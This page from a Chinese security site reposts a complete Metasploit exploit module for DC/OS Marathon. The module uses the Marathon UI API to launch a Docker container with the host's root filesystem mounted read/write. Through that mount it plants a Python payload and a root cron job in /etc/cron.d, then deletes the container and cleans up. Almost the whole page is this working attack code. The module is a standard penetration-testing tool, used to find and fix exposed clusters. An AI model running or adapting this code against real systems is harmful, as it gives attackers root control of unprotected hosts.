首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DC/OS Marathon UI - Docker Exploit (Metasploit)
来源:metasploit.com 作者:Daguerre 发布时间:2017-06-08  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
        a docker container with the '/' path mounted with read/write
        permissions on the host server that is running the docker container.
        As the docker container executes command as uid 0 it is honored
        by the host operating system allowing the attacker to edit/create
        files owed by root. This exploit abuses this to creates a cron job
        in the '/etc/cron.d/' path of the host server.
 
        *Notes: The docker image must be a valid docker image from
        hub.docker.com. Further more the docker container will only
        deploy if there are resources available in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
      ],
      'Targets'            => [
        [ 'Python', {
            'Platform'   => 'python',
            'Arch'       => ARCH_PYTHON,
            'Payload'    => {
              'Compat'   => {
                'ConnectionType' => 'reverse noconn none tunnel'
              }
            }
          }
        ]
      ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))
 
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end
 
  def get_apps
    res = send_request_raw({
      'method'  => 'GET',
      'uri'     => target_uri.path
    })
    return unless res and res.code == 200
 
    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)
 
    apps
  end
 
  def del_container(container_id)
    res = send_request_raw({
      'method'  => 'DELETE',
      'uri'     => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200
 
    res.code
  end
 
  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
 
    rand_text_alpha_lower(8)
  end
 
  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
 
    cron_command = "python #{payload_path}"
    payload_data = payload.raw
 
    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"
 
    command
  end
 
  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'                 => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'                => 1,
      'mem'                 => 128,
      'disk'                => 0,
      'instances'           => 1,
      'id'                  => container_id,
      'container'           => {
        'docker'            => {
          'image'           => datastore['DOCKERIMAGE'],
          'network'         => 'HOST',
        },
        'type'              => 'DOCKER',
        'volumes'           => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'                 => {},
      'labels'              => {}
    }
 
    container_data
  end
 
  def check
    return Exploit::CheckCode::Safe if get_apps.nil?
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end
    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()
 
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
 
    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)
    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")
 
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status
 
      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"
 
        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end
 
    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cisco Catalyst 2960 IOS 12.2(5
·Linux Kernel - 'ping' Local De
·BIND 9.10.5 - Unquoted Service
·Linux Kernel < 4.10.13 - 'keyc
·Parallels Desktop - Virtual Ma
·PuTTY < 0.68 - 'ssh_agent_chan
·DNSTracer 1.8.1 - Buffer Overf
·Mikrotik RouterOS 6.28 FTP Buf
·EnGenius EnShare IoT Gigabit C
·Windows UAC Protection Bypass
·Disk Sorter 9.7.14 - 'Input Di
·VMware Workstation 12 Pro - De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved